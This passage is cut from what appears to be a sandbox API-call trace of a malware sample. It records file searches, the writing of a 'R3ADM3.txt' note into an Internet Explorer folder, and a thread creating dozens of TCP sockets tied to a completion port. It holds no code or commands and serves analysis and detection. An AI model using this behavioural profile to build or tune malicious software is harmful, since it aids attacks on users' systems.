hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651dcb30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x651dcb30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651dcb30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0161.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec0e8 | out: hHeap=0xea0000) returned 1 [0161.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeccc0 | out: hHeap=0xea0000) returned 1 [0161.574] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0161.574] Sleep (dwMilliseconds=0x32) [0161.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec018 | out: hHeap=0xea0000) returned 1 [0161.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0161.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0161.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec018 [0161.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77969d0 [0161.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec018 | out: hHeap=0xea0000) returned 1 [0161.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec018 [0161.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0161.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec0e8 [0161.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebfb0 [0161.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0161.993] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebfb0 | out: hHeap=0xea0000) returned 1 [0161.993] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec0e8 | out: hHeap=0xea0000) returned 1 [0161.993] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0161.993] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 275 os_tid = 0x780 [0137.037] Sleep (dwMilliseconds=0x3e8) [0138.062] Sleep (dwMilliseconds=0x3e8) [0140.026] Sleep (dwMilliseconds=0x3e8) [0141.087] Sleep (dwMilliseconds=0x3e8) [0142.319] Sleep (dwMilliseconds=0x3e8) [0143.334] Sleep (dwMilliseconds=0x3e8) [0144.431] Sleep (dwMilliseconds=0x3e8) [0145.439] Sleep (dwMilliseconds=0x3e8) [0146.488] Sleep (dwMilliseconds=0x3e8) [0147.498] Sleep (dwMilliseconds=0x3e8) [0148.547] Sleep (dwMilliseconds=0x3e8) [0149.599] Sleep (dwMilliseconds=0x3e8) [0150.713] Sleep (dwMilliseconds=0x3e8) [0151.835] Sleep (dwMilliseconds=0x3e8) [0152.849] Sleep (dwMilliseconds=0x3e8) [0154.147] Sleep (dwMilliseconds=0x3e8) [0155.754] Sleep (dwMilliseconds=0x3e8) [0156.953] Sleep (dwMilliseconds=0x3e8) [0158.106] Sleep (dwMilliseconds=0x3e8) [0159.213] Sleep (dwMilliseconds=0x3e8) [0160.241] Sleep (dwMilliseconds=0x3e8) [0161.336] Sleep (dwMilliseconds=0x3e8) Thread: id = 276 os_tid = 0xa18 [0137.038] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0137.038] CreateTimerQueue () returned 0xebed28 [0137.038] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0137.039] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 1 [0137.039] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0137.039] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0137.040] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2c4 [0137.040] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0137.041] bind (s=0x2c4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.042] CreateIoCompletionPort (FileHandle=0x2c4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.042] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2c8 [0137.042] bind (s=0x2c8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.042] CreateIoCompletionPort (FileHandle=0x2c8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.042] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2cc [0137.042] bind (s=0x2cc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.043] CreateIoCompletionPort (FileHandle=0x2cc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.043] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2d0 [0137.043] bind (s=0x2d0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.043] CreateIoCompletionPort (FileHandle=0x2d0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.043] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2d4 [0137.043] bind (s=0x2d4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.043] CreateIoCompletionPort (FileHandle=0x2d4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.043] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2d8 [0137.044] bind (s=0x2d8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.044] CreateIoCompletionPort (FileHandle=0x2d8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.044] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2dc [0137.044] bind (s=0x2dc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.044] CreateIoCompletionPort (FileHandle=0x2dc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.044] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2e0 [0137.045] bind (s=0x2e0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.045] CreateIoCompletionPort (FileHandle=0x2e0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.045] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2e4 [0137.045] bind (s=0x2e4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.045] CreateIoCompletionPort (FileHandle=0x2e4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.046] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2e8 [0137.046] bind (s=0x2e8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.046] CreateIoCompletionPort (FileHandle=0x2e8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.046] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2ec [0137.046] bind (s=0x2ec, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.046] CreateIoCompletionPort (FileHandle=0x2ec, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.047] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2f0 [0137.047] bind (s=0x2f0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.047] CreateIoCompletionPort (FileHandle=0x2f0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.047] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2f4 [0137.047] bind (s=0x2f4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.047] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.048] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2f8 [0137.048] bind (s=0x2f8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.048] CreateIoCompletionPort (FileHandle=0x2f8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.048] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2fc [0137.048] bind (s=0x2fc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.048] CreateIoCompletionPort (FileHandle=0x2fc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.049] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x300 [0137.049] bind (s=0x300, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.049] CreateIoCompletionPort (FileHandle=0x300, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.049] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x304 [0137.049] bind (s=0x304, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.049] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.049] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x308 [0137.052] bind (s=0x308, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.052] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.052] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x30c [0137.054] bind (s=0x30c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.054] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.054] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x310 [0137.054] bind (s=0x310, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.054] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.054] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x314 [0137.055] bind (s=0x314, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.055] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.055] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x318 [0137.055] bind (s=0x318, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.055] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.055] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x31c [0137.056] bind (s=0x31c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.056] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.056] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x320 [0137.056] bind (s=0x320, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.056] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.056] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x324 [0137.057] bind (s=0x324, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.057] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.057] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x328 [0137.057] bind (s=0x328, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.057] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.057] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x32c [0137.057] bind (s=0x32c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.058] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.058] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x330 [0137.058] bind (s=0x330, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.058] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.058] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x334 [0137.058] bind (s=0x334, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.058] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.059] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x338 [0137.059] bind (s=0x338, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.059] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.059] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x33c [0137.059] bind (s=0x33c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.059] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.059] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x340 [0137.060] bind (s=0x340, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.060] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.060] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x344 [0137.060] bind (s=0x344, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.060] CreateIoCompletionPort (FileHandle=0x344, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.060] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x348 [0137.060] bind (s=0x348, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.061] CreateIoCompletionPort (FileHandle=0x348, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.061] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x34c [0137.061] bind (s=0x34c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.061] CreateIoCompletionPort (FileHandle=0x34c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.061] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x350 [0137.061] bind (s=0x350, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.062] CreateIoCompletionPort (FileHandle=0x350, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.062] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x354 [0137.062] bind (s=0x354, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.062] CreateIoCompletionPort (FileHandle=0x354, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.062] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x358 [0137.062] bind (s=0x358, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.062] CreateIoCompletionPort (FileHandle=0x358, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.062] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x35c [0137.063] bind (s=0x35c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.063] CreateIoCompletionPort (FileHandle=0x35c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.063] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x360 [0137.063] bind (s=0x360, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.063] CreateIoCompletionPort (FileHandle=0x360, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.063] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x364 [0137.064] bind (s=0x364, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.064] CreateIoCompletionPort (FileHandle=0x364, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.064] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x368 [0137.064] bind (s=0x368, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.064] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.064] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x36c [0137.064] bind (s=0x36c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.065] CreateIoCompletionPort (FileHandle=0x36c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.065] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x370 [0137.065] bind (s=0x370, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.065] CreateIoCompletionPort (FileHandle=0x370, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.065] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x374 [0137.065] bind (s=0x374, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.065] CreateIoCompletionPort (FileHandle=0x374, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.065] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x378 [0137.066] bind (s=0x378, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.066] CreateIoCompletionPort (FileHandle=0x378, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.066] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x37c [0137.066] bind (s=0x37c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.066] CreateIoCompletionPort (FileHandle=0x37c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.066] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x380 [0137.066] bind (s=0x380, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.067] CreateIoCompletionPort (FileHandle=0x380, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.067] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x384 [0137.067] bind (s=0x384, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.067] CreateIoCompletionPort (FileHandle=0x384, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.067] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x388 [0137.067] bind (s=0x388, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.068] CreateIoCompletionPort (FileHandle=0x388, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.068] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x38c [0137.068] bind (s=0x38c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.068] CreateIoCompletionPort (FileHandle=0x38c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.068] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x390 [0137.068] bind (s=0x390, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.068] CreateIoCompletionPort (FileHandle=0x390, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.068] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x394 [0137.069] bind (s=0x394, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.069] CreateIoCompletionPort (FileHandle=0x394, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.069] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x398 [0137.070] bind (s=0x398, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.070] CreateIoCompletionPort (FileHandle=0x398, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.070] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x39c [0137.070] bind (s=0x39c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.070] CreateIoCompletionPort (FileHandle=0x39c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.070] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3a0 [0137.071] bind (s=0x3a0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.071] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.071] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3a4 [0137.071] bind (s=0x3a4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.071] CreateIoCompletionPort (FileHandle=0x3a4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.071] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3a8 [0137.071] bind (s=0x3a8, 